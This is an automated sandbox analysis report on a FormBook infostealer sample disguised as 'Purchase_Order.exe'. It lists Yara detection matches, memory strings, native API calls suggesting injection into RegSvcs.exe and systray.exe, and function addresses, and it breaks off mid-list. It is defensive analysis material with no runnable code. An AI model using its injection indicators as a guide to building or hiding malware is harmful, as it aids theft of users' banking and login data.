Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Purchase_Order.exe, 00000000.00000003.243758051.00000000061F1000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com-u
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase_Order.exe
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004181C0 NtCreateFile, 4_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00418270 NtReadFile, 4_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004182F0 NtClose, 4_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004183A0 NtAllocateVirtualMemory, 4_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041826A NtReadFile, 4_2_0041826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004182EE NtClose, 4_2_004182EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041839A NtAllocateVirtualMemory, 4_2_0041839A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_012B9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B99A0 NtCreateSection,LdrInitializeThunk, 4_2_012B99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_012B9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9840 NtDelayExecution,LdrInitializeThunk, 4_2_012B9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_012B98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A20 NtResumeThread,LdrInitializeThunk, 4_2_012B9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_012B9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A50 NtCreateFile,LdrInitializeThunk, 4_2_012B9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9540 NtReadFile,LdrInitializeThunk, 4_2_012B9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B95D0 NtClose,LdrInitializeThunk, 4_2_012B95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_012B9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_012B97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_012B9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_012B9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_012B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_012B96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9950 NtQueueApcThread, 4_2_012B9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B99D0 NtCreateProcessEx, 4_2_012B99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9820 NtEnumerateKey, 4_2_012B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BB040 NtSuspendThread, 4_2_012BB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B98A0 NtWriteVirtualMemory, 4_2_012B98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9B00 NtSetValueKey, 4_2_012B9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BA3B0 NtGetContextThread, 4_2_012BA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A10 NtQuerySection, 4_2_012B9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9A80 NtOpenDirectoryObject, 4_2_012B9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9520 NtWaitForSingleObject, 4_2_012B9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BAD30 NtSetContextThread, 4_2_012BAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9560 NtWriteFile, 4_2_012B9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B95F0 NtQueryInformationFile, 4_2_012B95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9730 NtQueryVirtualMemory, 4_2_012B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BA710 NtOpenProcessToken, 4_2_012BA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9760 NtOpenProcess, 4_2_012B9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9770 NtSetInformationFile, 4_2_012B9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012BA770 NtOpenThread, 4_2_012BA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9610 NtEnumerateValueKey, 4_2_012B9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9670 NtQueryInformationProcess, 4_2_012B9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B9650 NtQueryValueKey, 4_2_012B9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012B96D0 NtCreateKey, 4_2_012B96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA95D0 NtClose,LdrInitializeThunk, 16_2_04FA95D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9540 NtReadFile,LdrInitializeThunk, 16_2_04FA9540
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_04FA96E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA96D0 NtCreateKey,LdrInitializeThunk, 16_2_04FA96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_04FA9660
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9650 NtQueryValueKey,LdrInitializeThunk, 16_2_04FA9650
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9FE0 NtCreateMutant,LdrInitializeThunk, 16_2_04FA9FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9780 NtMapViewOfSection,LdrInitializeThunk, 16_2_04FA9780
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9710 NtQueryInformationToken,LdrInitializeThunk, 16_2_04FA9710
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_04FA9860
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9840 NtDelayExecution,LdrInitializeThunk, 16_2_04FA9840
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA99A0 NtCreateSection,LdrInitializeThunk, 16_2_04FA99A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_04FA9910
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A50 NtCreateFile,LdrInitializeThunk, 16_2_04FA9A50
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA95F0 NtQueryInformationFile, 16_2_04FA95F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9560 NtWriteFile, 16_2_04FA9560
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAAD30 NtSetContextThread, 16_2_04FAAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9520 NtWaitForSingleObject, 16_2_04FA9520
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9670 NtQueryInformationProcess, 16_2_04FA9670
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9610 NtEnumerateValueKey, 16_2_04FA9610
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA97A0 NtUnmapViewOfSection, 16_2_04FA97A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAA770 NtOpenThread, 16_2_04FAA770
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9770 NtSetInformationFile, 16_2_04FA9770
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9760 NtOpenProcess, 16_2_04FA9760
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9730 NtQueryVirtualMemory, 16_2_04FA9730
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAA710 NtOpenProcessToken, 16_2_04FAA710
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA98F0 NtReadVirtualMemory, 16_2_04FA98F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA98A0 NtWriteVirtualMemory, 16_2_04FA98A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAB040 NtSuspendThread, 16_2_04FAB040
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9820 NtEnumerateKey, 16_2_04FA9820
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA99D0 NtCreateProcessEx, 16_2_04FA99D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9950 NtQueueApcThread, 16_2_04FA9950
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A80 NtOpenDirectoryObject, 16_2_04FA9A80
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A20 NtResumeThread, 16_2_04FA9A20
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A10 NtQuerySection, 16_2_04FA9A10
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9A00 NtProtectVirtualMemory, 16_2_04FA9A00
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FAA3B0 NtGetContextThread, 16_2_04FAA3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FA9B00 NtSetValueKey, 16_2_04FA9B00
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D81C0 NtCreateFile, 16_2_010D81C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D83A0 NtAllocateVirtualMemory, 16_2_010D83A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D8270 NtReadFile, 16_2_010D8270
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D82F0 NtClose, 16_2_010D82F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D839A NtAllocateVirtualMemory, 16_2_010D839A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D826A NtReadFile, 16_2_010D826A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D82EE NtClose, 16_2_010D82EE
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_0291C2B0 0_2_0291C2B0
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_029199A0 0_2_029199A0
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_05E60040 0_2_05E60040
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_05E667F9 0_2_05E667F9
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_05E66808 0_2_05E66808
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_004F2050 0_2_004F2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B8F6 4_2_0041B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00401175 4_2_00401175
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00408C5C 4_2_00408C5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00408C60 4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041C40A 4_2_0041C40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00408C1A 4_2_00408C1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00402D8D 4_2_00402D8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00402FB0 4_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127F900 4_2_0127F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0134E824 4_2_0134E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129A830 4_2_0129A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01331002 4_2_01331002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A20A0 4_2_012A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013420A8 4_2_013420A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128B090 4_2_0128B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013428EC 4_2_013428EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01342B28 4_2_01342B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129AB40 4_2_0129AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012AEBB0 4_2_012AEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133DBD2 4_2_0133DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013303DA 4_2_013303DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132FA2B 4_2_0132FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013422AE 4_2_013422AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01270D20 4_2_01270D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01342D07 4_2_01342D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01341D55 4_2_01341D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A2581 4_2_012A2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128D5E0 4_2_0128D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013425DD 4_2_013425DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0128841F 4_2_0128841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133D466 4_2_0133D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01341FF1 4_2_01341FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0134DFCE 4_2_0134DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01296E30 4_2_01296E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133D616 4_2_0133D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01342EF7 4_2_01342EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05032D07 16_2_05032D07
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05031D55 16_2_05031D55
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05022D82 16_2_05022D82
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8B477 16_2_04F8B477
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050325DD 16_2_050325DD
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7841F 16_2_04F7841F
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7D5E0 16_2_04F7D5E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502D466 16_2_0502D466
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F92581 16_2_04F92581
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024496 16_2_05024496
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F60D20 16_2_04F60D20
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F86E30 16_2_04F86E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503DFCE 16_2_0503DFCE
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05031FF1 16_2_05031FF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502D616 16_2_0502D616
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05032EF7 16_2_05032EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F920A0 16_2_04F920A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7B090 16_2_04F7B090
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8A830 16_2_04F8A830
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021002 16_2_05021002
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0503E824 16_2_0503E824
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F899BF 16_2_04F899BF
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050320A8 16_2_050320A8
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F84120 16_2_04F84120
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050328EC 16_2_050328EC
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F6F900 16_2_04F6F900
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05032B28 16_2_05032B28
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0500CB4F 16_2_0500CB4F
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0502DBD2 16_2_0502DBD2
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050203DA 16_2_050203DA
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050123E3 16_2_050123E3
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9ABD8 16_2_04F9ABD8
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_0501FA2B 16_2_0501FA2B
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F9EBB0 16_2_04F9EBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_050322AE 16_2_050322AE
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8AB40 16_2_04F8AB40
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05024AEF 16_2_05024AEF
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F8A309 16_2_04F8A309
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C2D8D 16_2_010C2D8D
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C2D90 16_2_010C2D90
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DC40A 16_2_010DC40A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C8C1A 16_2_010C8C1A
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C8C5C 16_2_010C8C5C
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C8C60 16_2_010C8C60
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010C2FB0 16_2_010C2FB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0127B150 appears 72 times
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04F6B150 appears 136 times
PE file contains strange resources
